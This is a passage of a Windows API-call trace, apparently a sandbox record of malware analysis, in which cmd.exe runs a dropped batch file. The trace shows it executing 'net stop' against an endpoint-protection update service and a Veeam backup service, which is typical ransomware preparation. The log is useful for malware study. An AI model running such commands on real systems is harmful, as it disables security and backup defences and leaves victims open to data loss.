_get_osfhandle (_FileHandle=0) returned 0xfffffffe [0042.405] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0042.405] SetConsoleInputExeNameW () returned 0x1 [0042.405] GetConsoleOutputCP () returned 0x1b5 [0042.405] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0042.405] SetThreadUILanguage (LangId=0x0) returned 0x409 [0042.405] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0042.405] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0042.405] _get_osfhandle (_FileHandle=3) returned 0x74 [0042.405] SetFilePointer (in: hFile=0x74, lDistanceToMove=1661, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x67d [0042.405] GetProcessHeap () returned 0x3e0000 [0042.405] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0042.405] GetProcessHeap () returned 0x3e0000 [0042.405] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0042.405] GetProcessHeap () returned 0x3e0000 [0042.405] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0042.405] GetProcessHeap () returned 0x3e0000 [0042.405] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0042.406] GetProcessHeap () returned 0x3e0000 [0042.406] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0042.406] GetProcessHeap () returned 0x3e0000 [0042.406] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0042.406] GetProcessHeap () returned 0x3e0000 [0042.406] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0042.406] GetProcessHeap () returned 0x3e0000 [0042.406] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0042.406] GetProcessHeap () returned 0x3e0000 [0042.406] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0042.406] GetProcessHeap () returned 0x3e0000 [0042.406] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0042.406] GetProcessHeap () returned 0x3e0000 [0042.406] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0042.406] GetProcessHeap () returned 0x3e0000 [0042.406] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0042.406] GetProcessHeap () returned 0x3e0000 [0042.406] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0042.406] _get_osfhandle (_FileHandle=3) returned 0x74 [0042.406] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x67d [0042.406] ReadFile (in: hFile=0x74, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x1244, lpOverlapped=0x0) returned 1 [0042.406] SetFilePointer (in: hFile=0x74, lDistanceToMove=1690, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x69a [0042.406] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=29, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop EPUpdateService /y\r\n /y\r\nryΓÇ¥ /y\r\nΓÇ¥ /y\r\nlures\r\nnded\r\n") returned 29 [0042.406] _get_osfhandle (_FileHandle=3) returned 0x74 [0042.406] GetFileType (hFile=0x74) returned 0x1 [0042.406] _get_osfhandle (_FileHandle=3) returned 0x74 [0042.406] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x69a [0042.406] GetProcessHeap () returned 0x3e0000 [0042.406] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0042.406] GetProcessHeap () returned 0x3e0000 [0042.406] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0042.407] _tell (_FileHandle=3) returned 1690 [0042.407] _close (_FileHandle=3) returned 0 [0042.407] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0042.407] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0042.407] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0042.407] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0042.407] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0042.407] _wcsicmp (_String1="net", _String2="CD") returned 11 [0042.407] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0042.407] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0042.407] _wcsicmp (_String1="net", _String2="REN") returned -4 [0042.407] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0042.407] _wcsicmp (_String1="net", _String2="SET") returned -5 [0042.407] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0042.407] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0042.407] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0042.408] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0042.408] _wcsicmp (_String1="net", _String2="MD") returned 1 [0042.408] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0042.408] _wcsicmp (_String1="net", _String2="RD") returned -4 [0042.408] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0042.408] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0042.408] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0042.408] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0042.408] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0042.408] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0042.408] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0042.408] _wcsicmp (_String1="net", _String2="VER") returned -8 [0042.408] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0042.408] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0042.408] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0042.408] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0042.408] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0042.408] _wcsicmp (_String1="net", _String2="START") returned -5 [0042.408] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0042.408] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0042.408] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0042.408] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0042.408] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0042.408] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0042.408] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0042.408] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0042.408] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0042.408] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0042.408] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0042.408] SetErrorMode (uMode=0x0) returned 0x1 [0042.409] GetProcessHeap () returned 0x3e0000 [0042.409] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0042.409] GetProcessHeap () returned 0x3e0000 [0042.409] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0042.409] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0042.409] GetProcessHeap () returned 0x3e0000 [0042.409] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0042.409] GetProcessHeap () returned 0x3e0000 [0042.409] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0042.409] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0042.409] GetProcessHeap () returned 0x3e0000 [0042.409] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0042.409] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0042.409] GetProcessHeap () returned 0x3e0000 [0042.409] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0042.409] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0042.409] GetProcessHeap () returned 0x3e0000 [0042.409] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0042.409] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0042.409] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0042.409] GetLastError () returned 0x2 [0042.409] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0042.409] GetLastError () returned 0x2 [0042.410] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0042.410] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0042.410] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0042.410] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0042.410] GetLastError () returned 0x2 [0042.410] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0042.410] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0042.410] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0042.410] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0042.410] SetErrorMode (uMode=0x0) returned 0x1 [0042.410] GetProcessHeap () returned 0x3e0000 [0042.410] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0042.410] GetProcessHeap () returned 0x3e0000 [0042.410] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0042.410] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0042.410] GetProcessHeap () returned 0x3e0000 [0042.411] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0042.411] GetProcessHeap () returned 0x3e0000 [0042.411] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0042.411] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0042.411] GetProcessHeap () returned 0x3e0000 [0042.411] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0042.411] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0042.411] GetProcessHeap () returned 0x3e0000 [0042.411] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0042.411] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0042.411] GetProcessHeap () returned 0x3e0000 [0042.411] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0042.411] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0042.411] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0042.411] GetLastError () returned 0x2 [0042.411] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0042.411] GetLastError () returned 0x2 [0042.411] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0042.411] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0042.411] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0042.412] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0042.412] GetLastError () returned 0x2 [0042.412] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0042.412] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0042.412] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0042.412] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0042.412] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0042.412] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0042.412] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0042.412] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop EPUpdateService /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop EPUpdateService /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop EPUpdateService /y", lpProcessInformation=0x3beae0*(hProcess=0x78, hThread=0x74, dwProcessId=0x5b8, dwThreadId=0x6ac)) returned 1 [0042.416] CloseHandle (hObject=0x74) returned 1 [0042.416] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0042.416] GetProcessHeap () returned 0x3e0000 [0042.416] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0042.416] GetEnvironmentStringsW () returned 0x3f8408* [0042.416] GetProcessHeap () returned 0x3e0000 [0042.416] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0042.416] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0042.416] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0042.668] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0042.675] CloseHandle (hObject=0x78) returned 1 [0042.678] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0042.678] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0042.678] GetProcessHeap () returned 0x3e0000 [0042.678] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0042.678] GetEnvironmentStringsW () returned 0x3f8408* [0042.678] GetProcessHeap () returned 0x3e0000 [0042.678] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0042.678] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0042.678] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0042.678] GetProcessHeap () returned 0x3e0000 [0042.678] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0042.678] GetEnvironmentStringsW () returned 0x3f8408* [0042.678] GetProcessHeap () returned 0x3e0000 [0042.678] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0042.679] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0042.679] GetProcessHeap () returned 0x3e0000 [0042.679] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0042.679] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0042.679] _get_osfhandle (_FileHandle=1) returned 0x264 [0042.679] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0042.679] _get_osfhandle (_FileHandle=1) returned 0x264 [0042.679] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0042.679] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0042.679] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0042.679] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0042.679] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0042.680] SetConsoleInputExeNameW () returned 0x1 [0042.680] GetConsoleOutputCP () returned 0x1b5 [0042.680] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0042.680] SetThreadUILanguage (LangId=0x0) returned 0x409 [0042.680] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0042.680] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0042.680] _get_osfhandle (_FileHandle=3) returned 0x78 [0042.680] SetFilePointer (in: hFile=0x78, lDistanceToMove=1690, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x69a [0042.680] GetProcessHeap () returned 0x3e0000 [0042.680] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0042.680] GetProcessHeap () returned 0x3e0000 [0042.680] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0042.680] GetProcessHeap () returned 0x3e0000 [0042.680] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0042.680] GetProcessHeap () returned 0x3e0000 [0042.680] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0042.680] GetProcessHeap () returned 0x3e0000 [0042.680] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0042.680] GetProcessHeap () returned 0x3e0000 [0042.680] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0042.680] GetProcessHeap () returned 0x3e0000 [0042.680] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0042.681] GetProcessHeap () returned 0x3e0000 [0042.681] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0042.681] GetProcessHeap () returned 0x3e0000 [0042.681] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0042.681] GetProcessHeap () returned 0x3e0000 [0042.681] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0042.681] GetProcessHeap () returned 0x3e0000 [0042.681] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0042.681] GetProcessHeap () returned 0x3e0000 [0042.681] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0042.681] GetProcessHeap () returned 0x3e0000 [0042.681] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0042.681] _get_osfhandle (_FileHandle=3) returned 0x78 [0042.681] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x69a [0042.681] ReadFile (in: hFile=0x78, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x1227, lpOverlapped=0x0) returned 1 [0042.681] SetFilePointer (in: hFile=0x78, lDistanceToMove=1721, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6b9 [0042.681] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=31, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop VeeamTransportSvc /y\r\ny\r\nryΓÇ¥ /y\r\nΓÇ¥ /y\r\nlures\r\nnded\r\n") returned 31 [0042.681] _get_osfhandle (_FileHandle=3) returned 0x78 [0042.681] GetFileType (hFile=0x78) returned 0x1 [0042.681] _get_osfhandle (_FileHandle=3) returned 0x78 [0042.681] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x6b9 [0042.681] GetProcessHeap () returned 0x3e0000 [0042.681] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0042.681] GetProcessHeap () returned 0x3e0000 [0042.681] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0042.682] _tell (_FileHandle=3) returned 1721 [0042.682] _close (_FileHandle=3) returned 0 [0042.682] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0042.682] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0042.682] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0042.682] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0042.682] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0042.682] _wcsicmp (_String1="net", _String2="CD") returned 11 [0042.682] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0042.682] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0042.682] _wcsicmp (_String1="net", _String2="REN") returned -4 [0042.682] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0042.682] _wcsicmp (_String1="net", _String2="SET") returned -5 [0042.682] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0042.682] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0042.682] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0042.682] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0042.682] _wcsicmp (_String1="net", _String2="MD") returned 1 [0042.682] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0042.682] _wcsicmp (_String1="net", _String2="RD") returned -4 [0042.683] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0042.683] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0042.683] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0042.683] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0042.683] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0042.683] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0042.683] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0042.683] _wcsicmp (_String1="net", _String2="VER") returned -8 [0042.683] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0042.683] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0042.683] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0042.683] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0042.683] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0042.683] _wcsicmp (_String1="net", _String2="START") returned -5 [0042.683] 